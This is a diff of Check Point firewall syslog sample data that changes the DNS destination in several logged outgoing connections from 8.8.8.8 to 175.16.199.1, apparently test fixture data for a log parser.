-<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41223"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52732"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53883"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38848"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43014"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52935"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41223"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52732"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53883"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38848"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44856"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53216"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55992"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50371"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55992"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50371"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38624"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52838"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38144"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47601"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52838"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38144"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47601"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.169"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51626"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33672"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57220"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33597"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52854"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
